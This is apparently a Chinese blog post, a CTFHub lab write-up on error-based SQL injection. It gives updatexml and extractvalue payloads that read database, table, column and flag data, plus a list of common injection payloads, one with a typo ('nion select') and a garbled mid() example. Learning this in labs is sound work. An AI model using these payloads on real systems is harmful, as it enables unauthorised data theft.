CTFHub | 报错注入

已于 2023-03-13 16:26:04 修改
阅读量2.5k 收藏 9
点赞数 5
分类专栏: CTF精进之路 文章标签: CTF web安全
于 2022-10-28 15:57:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51191308/article/details/127570131
版权

0x00 前言

        CTFHub 专注网络安全、信息安全、白帽子技术的在线学习,实训平台。提供优质的赛事及学习服务,拥有完善的题目环境及配套 writeup ,降低 CTF 学习入门门槛,快速帮助选手成长,跟随主流比赛潮流。

        

        

0x01 题目描述

报错注入:

        (无)

网页显示内容

        

        

0x02 解题过程

        因为报错注入的语句比较多,测试了几个函数发现 updatexml 函数存在 SQL 报错注入漏洞,得到数据库名称 sqli 后,查询数据库表名,发现一个可疑表名 flag 。检查这个 flag 表中的列,发现一个列名为 flag ,查询数据发现此题 flag 。发现数据不完整,使用 mid 函数进行查询从字符 2 开始得到完整数据。

        

查询数据库名称

union select updatexml(1,concat(0x7e,database(),0x7e),1);

        

查询当前数据库sqli的表名,发现有一个表名为flag比较可疑

and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='sqli'),0x7e))--+

        

查询当前表flag,发现有一个列为flag

and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flag'),0x7e))--+

         

查询flag列名中的数据发现此题flag,但是发现flag不完整

and extractvalue(1,concat(0x7e,(select flag from flag),0x7e))--+

        

使用mid函数跳过第一个字符c,提取剩下的全部字符

and extractvalue(1,concat(0x7e,mid((select flag from flag),2),0x7e))--+

        

        

0x03 报错注入

注入语句解析:

查询数据库:union select updatexml(1,concat(0x7e,database(),0x7e),1);

#updatexml 对XML文档进行查询的函数,database() 数据库

查询表名:and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='sqli'),0x7e))--+

#table 表,schema 元数据的一个抽象集合

查询列名:and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flag'),0x7e))--+

查询数据:and extractvalue(1,concat(0x7e,(select flag from flag),0x7e))--+

提取字符:and extractvalue(1,concat(0x7e,mid((select flag from flag),2),0x7e))--+

mid 函数使用方法:

参数描述
column_name必需。要提取字符的字段。
start必需。规定开始位置(起始值是 1)。
length可选。要返回的字符数。如果省略,则 MID() 函数返回剩余文本。

payload:mid((select flag from flag),column_name,start,length

常用注入语句:

1.floor()报错注入

union Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a--+

2.extractvalue()报错注入

and extractvalue(1,concat(0x7e,(select database()),0x7e))--+

3.updatexml()报错注入

and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

4.exp()报错注入

nion select (exp(~(select * FROM(SELECT USER())a))),2,3--+

5.NAME_CONST()

union select 1,2,3 from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x --+

        

        

0x04 参考文献

[1].郁离歌. SQL注入之报错注入的一些随笔[EB/OL]. [2022-10-28]. https://blog.csdn.net/like98k/article/details/79646512.

[2].Dar1in9. sql注入之报错注入[EB/OL]. [2022-10-28]. https://blog.csdn.net/silence1_/article/details/90812612.

[3].w3school. SQL MID() 函数[EB/OL]. [2022-10-28]. https://www.w3school.com.cn/sql/sql_func_mid.asp.

        

        

0x05 总结

文章内容为学习记录的笔记,由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。

尼泊罗河伯
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 6
    评论
专栏目录
ctfhub web全部做题记录(持续跟新)
01-08
分为整数型和字符型注入,以及报错注入。可以通过调整查询参数来获取数据库信息,甚至直接读取flag字段。 【文件上传漏洞】无验证的文件上传功能可被利用来上传恶意文件,如PHP后门。通过修改文件头,绕过前端验证...
ctfhub:一些用于CTF环境的Docker
05-14
CTFhub — 基于Docker的CTF学习环境0x00 前言CTFhub是面向所有学习CTF的朋友的环境,不用了解docker原理及知识,仅仅简单执行几条命令即可完成整个平台的搭建。0x01 搭建环境使用CTFhub中的环境的前提条件需要在本地...
CTFHub - 报错注入
Have_a_great_day的博客
09-09 625
欢迎各位师傅以kill -9 的威力对文章进行检查,Zeus会认真分析听取各位师傅的留言。
CTFHUB-SQL注入-报错注入
weixin_68416970的博客
06-10 426
报错注入是一种SQL注入技术的变种,攻击者通过故意制造数据库错误来获取敏感信息。这种方法通常用于那些不允许正常错误信息回显的应用程序,攻击者利用数据库的错误处理机制,将希望得到的信息嵌入到可能导致错误的SQL语句中,从而使错误信息透露出所需的数据。
CTFHUB-报错注入
Web学习之路
03-21 235
理解
CTFHub报错注入
sGanYu
07-24 1842
手动注入 发现无论输入什么,都只会回显成功或者错误 可以根据updatexml的报错注入来获取信息 updatexml (string, xpath_string, string) 第一个参数:可以输入1,为XML文档对象的名称 第二个参数:xpath_string ,提取多个子节点的文本 第三个参数:可以输入1,替换查找的符合条件的参数 0x7e是一个代表~的十六进制,可以用’%’,或者’~’来代替 查询出两个表,一个为news一个为flag,这里也可以把'sqli'换成database
CTFHUB|SQL注入(sqlmap)
m0_60651303的博客
07-14 1191
差不多学了4天的SQL手工注入,学习一下sqlmap的使用,用工具偷偷懒。但等级越高,其速度越慢。一定要在时间内跑出来,要不然过期了就跑不出来了。1、顾名思义,要拿到cookie值。2、需要设置level至少为2。UA注入用--level 3。2、找数据库里面的表。4、爆破列里面的内容。过程中都会有五个选择。
CTFHUB报错注入的几种不同方式
PigletTT的博客
07-04 1102
CFTHUB 报错注入 一、报错注入原理 1.xml函数updatexml() UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称; 第二个参数:XPath_string (Xpath格式的字符串); 第三个参数:new_value,String格式,替换查找到的符合条件的数据; 该函数对XPath_string进行查询操作,如果符合语法格式要求,则用第三个参数替换,不符合语法格
CTFHUB——SQL 报错注入三种方法全解
wuuconix's blog
08-25 2940
背景 Sql注入主要有三种方法,extractvalue和updatexml函数形成的xpath报错,这算两种。还有一种就是floor实现的group by主键重复,这算另外一种。 本篇文章将对CTFHUB中的SQL报错注入题目从头到尾对这三种方法进行实践。 利用extractvalue来xpath报错。 1 and (select extractvalue(1, concat(0x7e, (select database())))) 1 and (select extractvalue(1, conc
CTFHub 报错注入
weixin_44732566的博客
02-20 4200
CTFHub 报错注入 当注入点不回显数据库查询的数据,那么通过一般的注入手段是无法返回相关数据库的信息,但是,如果查询时输入错误SQL代码会报错,并且是通过mysql_error(),mysqli_error()等返回错误。 ...
ctfhub】SQL注入报错注入
manerzi的博客
10-08 267
SQL注入报错注入
ctf:CTF评论|网络
04-19
周大福CTF评论|网络
3.18号日报,ctfhubweb,文件上传漏洞题目解法
03-18
本文将基于标题“3.18号日报,ctfhubweb,文件上传漏洞题目解法”以及描述“文件上传漏洞”,详细介绍几种典型的文件上传漏洞利用方法及其技术细节。 #### 一、无验证直接上传一句话木马 这类题目是最简单的,...
CtfHub-wp(web
01-23
本文主要探讨了CTF(Capture The Flag)竞赛中与Web安全相关的知识点,通过解决一系列问题,我们可以学习到如何发现和利用网站的漏洞获取关键信息。首先,提到了通过查找网站的备份文件来获取线索,例如在URL后添加...
Web安全:Web体系架构存在的安全问题和解决方室
程序员-张师傅
07-24 1477
Web体系架构在提供丰富功能和高效服务的同时,也面临着诸多安全问题。这些问题可能涉及数据泄露、服务中断、系统被控制等多个方面,对企业和个人造成不可估量的损失。
“微软蓝屏”事件暴露了网络安全哪些问题?
Asunqingwen的博客
07-23 469
微软蓝屏事件虽然只是一次技术问题,但却暴露了当前网络安全中的诸多隐患,通过此次事件,我们应该深刻反思并采取相应措施,提升网络安全水平,保护用户和企业的信息安全。网络安全不仅仅是技术问题,更是一个系统工程,需要各方的共同努力。只有不断提升安全意识和防护能力,才能在瞬息万变的网络环境中立于不败之地。
【网络安全】构建稳固与安全的网络环境:从“微软蓝屏”事件中汲取的教训
最新发布
一位前行者的博客
07-24 484
微软蓝屏”事件不仅是一次技术故障,更是一次对全球IT基础设施韧性和安全性的深刻检验。通过这次事件,我们应深刻反思并采取行动,共同构建一个更加稳固和安全的网络环境。只有这样,我们才能确保数字技术真正为世界人民带来福祉,而不是成为威胁。
ctfhub字符型注入
09-18
字符型注入是一种常见的Web漏洞,攻击者通过在输入框中插入恶意的字符来实现攻击。常见的字符型注入包括SQL注入、XPath注入、LDAP注入等。 对于CTF比赛中的字符型注入,一般可以通过输入一些特殊字符或者语句来实现注入。攻击者可以通过注入一些恶意的语句或者字符来获取敏感信息或者实现远程代码执行等操作。 例如,在一个搜索框中,输入以下语句: ``` ' or 1=1# ``` 这个语句的作用是在搜索条件中注入一个OR语句,并将搜索条件设置为1=1,这样就可以绕过认证,查看所有数据。其中#表示注释掉后面的语句,防止后续的语句被执行。 在实际的应用中,可以通过对输入进行过滤、转义等方式来防止字符型注入漏洞的产生。而对于攻击者来说,可以通过各种技巧来绕过这些防御措施,实现攻击。因此,对于Web开发人员来说,需要加强对Web安全的学习和了解,提高安全意识,才能更好地保护Web应用的安全
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尼泊罗河伯

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值